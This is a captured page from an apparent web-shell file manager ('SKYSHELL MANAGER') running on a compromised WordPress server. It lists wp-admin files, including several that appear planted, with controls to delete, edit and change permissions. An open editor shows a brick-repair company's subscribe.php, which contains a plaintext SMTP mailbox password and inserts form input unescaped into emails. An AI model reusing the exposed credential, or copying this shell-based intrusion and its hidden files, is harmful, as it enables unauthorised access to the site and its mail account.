📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: subscribe.php
<!-- Author: W3layouts Author URL: http://w3layouts.com License: Creative Commons Attribution 3.0 Unported License URL: http://creativecommons.org/licenses/by/3.0/ --> <?php session_start(); if(isset($_POST['Submit'])){ $email=$_REQUEST['email']; if ($email=="") { echo "All fields are required, please fill the form again. "; } else { // code for check server side validation if(empty($_SESSION['captcha_code'] ) || strcasecmp($_SESSION['captcha_code'], $_POST['captcha_code']) != 0){ $msg="<span style='color:red'>The Validation code does not match!</span>";// Captcha verification is incorrect. }else { // Captcha verification is Correct. Final Code Execute here! //$msg="<span style='color:green'>The Validation code has been matched. $email</span>"; include_once('/var/www/html/wxwpsite/repairbricks/PHPMailer/PHPMailerAutoload.php'); //PHPMailer Object $mail = new PHPMailer; //$mail->SMTPDebug = 3; $mail->Host = 'smtp.yandex.com'; // SMTP server $mail->Port = 465; // optional // used only when SMTP requires authentication $mail->SMTPAuth = true; $mail->Username = 'contact@repairbricks.com'; $mail->Password = 'FUVaj86J7PJaGQ'; $mail->SMTPSecure = 'ssl'; $mail->IsSMTP(); //From email address and name //$mail->From = "vinothkumar@webberax.com"; //$mail->FromName = "vinoth"; $mail->setFrom('contact@repairbricks.com', 'Rrepairbricks'); //To address and name $mail->addAddress($email, $name, $message); //$mail->addAddress('vinothkumar@webberax.com', 'hello'); //$mail->addAddress("recepient1@example.com"); //Recipient name is optional //Address to which recipient will reply $mail->addReplyTo("contact@repairbricks.com", "Reply"); //CC and BCC //$mail->addCC("vinothkumar@gmail.com"); //$mail->addBCC("bcc@example.com"); //Send HTML or Plain Text email $mail->isHTML(true); $mail->Subject = "Rrepairbricks [Success!]"; $mail->Body = "<p>This message confirms that you have subscribed from the Rrepairbricks newsletter.</p></br> <p>Thank you!</p></br> <i>This e-mail was sent from a contact form on (http://repairbricks.com)</i>"; $mail->AltBody = "This is the plain text version of the email content"; if(!$mail->send()) { $msg1="<span>Mailer Error</span>"; } else { $msg1="<span>Thanks for subscribing to our service.</span>"; } //PHPMailer Object $mail2 = new PHPMailer; //$mail->SMTPDebug = 3; $mail2->Host = 'smtp.yandex.com'; // SMTP server $mail2->Port = 465; // optional // used only when SMTP requires authentication $mail2->SMTPAuth = true; $mail2->Username = 'contact@repairbricks.com'; $mail2->Password = 'FUVaj86J7PJaGQ'; $mail2->SMTPSecure = 'ssl'; $mail2->IsSMTP(); $mail2->setFrom('contact@repairbricks.com', 'Rrepairbricks'); $mail2->addAddress('contact@repairbricks.com', 'Rrepairbricks'); $mail2->isHTML(true); $mail2->Subject = "Contact Details"; $mail2->Body = "<strong>Following user has been submitted contact details on your website <strong><br> Name : $name<br> Email : $email<br> Message: $message<br>"; $mail2->send(); } } } ?> <!DOCTYPE html> <html> <head> <title>Repairbricks</title> <!--/tags --> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="keywords" content="Instruction Responsive web template, Bootstrap Web Templates, Flat Web Templates, Android Compatible web template, Smartphone Compatible web template, free webdesigns for Nokia, Samsung, LG, SonyEricsson, Motorola web design" /> <script type="application/x-javascript"> addEventListener("load", function () { setTimeout(hideURLbar, 0); }, false); function hideURLbar() { window.scrollTo(0, 1); } </script> <!--capcha--> <script type='text/javascript'> function refreshCaptcha(){ var img = document.images['captchaimg']; img.src = img.src.substring(0,img.src.lastIndexOf("?"))+"?rand="+Math.random()*1000; } </script> <!--capcha-> <!--//tags --> <link href="css/bootstrap.css" rel="stylesheet" type="text/css" media="all" /> <link href="css/style.css" rel="stylesheet" type="text/css" media="all" /> <link href="css/font-awesome.css" rel="stylesheet"> <!-- //for bootstrap working --> <link href="//fonts.googleapis.com/css?family=Work+Sans:200,300,400,500,600,700" rel="stylesheet"> </head> <body> <!-- header --> <div class="header-1"> <div class="agileits_top_menu"> <div class="w3l_header_left"> <ul> <li><i class="fa fa-phone" aria-hidden="true"></i> 770-227-7913</li> <li><i class="fa fa-envelope-o" aria-hidden="true"></i> <a href="mailto:contact@repairbricks.com">contact@repairbricks.com</a></li> </ul> </div> <div class="clearfix"> </div> </div> <div class="content white agile-info"> <nav class="navbar navbar-default" role="navigation"> <div class="container"> <div class="navbar-header"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="index.php"> <img src="images/newlogo.png" class="img-responsive" alt=""/> </a> </div> <!--/.navbar-header--> <div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1"> <nav class="link-effect-2" id="link-effect-2"> <ul class="nav navbar-nav"> <li><a href="index.php" class="effect-3">Home</a></li> <li><a href="about.php" class="effect-3">About</a></li> <li><a href="services.php" class="effect-3">Services</a></li> <li><a href="gallery.php" class="effect-3">Gallery</a></li> <li><a href="contact.php" class="effect-3">Contact</a></li> </ul> </nav> </div> <!--/.navbar-collapse--> <!--/.navbar--> </div> </nav> </div> </div> <!-- //header --> <!-- /inner_content --> <div class="inner_content_info_agileits"> <div class="container"> <h3 class="heading-agileinfo">subscribe us</h3> <div class="inner_sec_grids_info_w3ls"> <div class="clearfix"> </div> <div class="w3layouts_mail_grid"> <center> <form action="subscribe.php" method="post" name="form1" id="form1"> <div class=""> <input type="text" name="name" placeholder="Name" required> </div> <div class=""> <input class="email" type="email" name="email" placeholder="Email" required> </div> <table width="400" border="0" align="center" cellpadding="5" cellspacing="1" class="table"> <?php if(isset($msg)){?> <tr> <td colspan="2" align="center" valign="top"><?php echo $msg;?></td> </tr> <?php } ?> <tr> <td align="right" valign="top"> Validation code:</td> <td><img src="captcha.php?rand=<?php echo rand();?>" id='captchaimg'><br> <label for='message'>Enter the code above here :</label> <br> <input id="captcha_code" name="captcha_code" type="text"> <br> Can't read the image? click <a href='javascript: refreshCaptcha();'>here</a> to refresh.</td> </tr> <tr> <td> </td> <!--<td><input name="Submit" type="submit" onclick="return validate();" value="Validate" class="button1"></td>--> </tr> </table> <input type="submit" name="Submit" value="Submit"> <?php if(isset($msg1)){?> <tr> <td colspan="2" align="center" valign="top"><?php echo $msg1;?></td> </tr> <?php } ?> </form> </center> </div> </div> </div> </div> <!-- //mid-services --> <!-- /map --> <!-- //map --> <!-- //inner_content --> <!-- footer --> <div class="footer_top_agileits"> <div class="container"> <div class="col-md-4 footer_grid"> <h3>Go Green with Red Brick</h3> <p align="justify">While brick is a naturally excellent insulator, we offer several designs that can boost the thermal efficiency of your building even further. These properties ease the burden on your HVAC system, allowing you to stay comfortable year-round while saving money on maintenance and repair costs, as well as your monthly power bill. With brick, you can say goodbye for good to drafts entering your house.</p> </div> <div class="col-md-4 footer_grid"> <h3>A Smarter Investment</h3> <p align="justify">Brick has been around for thousands of years, and it doesn’t look to be going out of fashion any time soon. With rustic good looks and timeless class, brick houses only ever increase in value. When considering the aforementioned savings together with enhanced resale value, it becomes clear that brick is the material you can’t afford NOT to build with! </p> </div> <div class="col-md-4 footer_grid"> <h3>Contact Info</h3> <ul class="address"> <li><i class="fa fa-map-marker" aria-hidden="true"></i>1645 Lakes Pkwy,Lawrenceville, <span>GA 30043,USA</span></li> <li><i class="fa fa-envelope" aria-hidden="true"></i><a href="mailto:contact@repairbricks.com">contact@repairbricks.com</a></li> <li><i class="fa fa-phone" aria-hidden="true"></i>770-227-7913</li> </ul> </div> <div class="clearfix"> </div> <div class="footer_grids"> <div class="clearfix"> </div> </div> </div> </div> <div class="footer_w3ls"> <div class="container"> <div class="footer_bottom1"> <a href="privacy.php">Privacy Policy</a> | <a href="terms.php">Terms and Conditions</a> | <a href="unsubscribe.php">Unsubscribe</a><br> <p>© 2018 Repairbricks. All rights reserved</p> </div> </div> </div> <!-- //footer --> <!-- modal --> <div class="modal about-modal fade" id="myModal" tabindex="-1" role="dialog"> <div class="modal-dialog" role="document"> <div class="modal-content"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button> <h4 class="modal-title">Instruction</h4> </div> <div class="modal-body"> <div class="agileits-w3layouts-info"> <img src="images/g12.jpg" class="img-responsive" alt="" /> <p>Duis venenatis, turpis eu bibendum porttitor, sapien quam ultricies tellus, ac rhoncus risus odio eget nunc. Pellentesque ac fermentum diam. Integer eu facilisis nunc, a iaculis felis. Pellentesque pellentesque tempor enim, in dapibus turpis porttitor quis. Suspendisse ultrices hendrerit massa. Nam id metus id tellus ultrices ullamcorper. Cras tempor massa luctus, varius lacus sit amet, blandit lorem. Duis auctor in tortor sed tristique. Proin sed finibus sem</p> </div> </div> </div> </div> </div> <!-- //modal --> <a href="#home" class="scroll" id="toTop" style="display: block;"> <span id="toTopHover" style="opacity: 1;"> </span></a> <!-- js --> <script type="text/javascript" src="js/jquery-2.1.4.min.js"></script> <script type="text/javascript" src="js/bootstrap.js"></script> </body> </html>
Save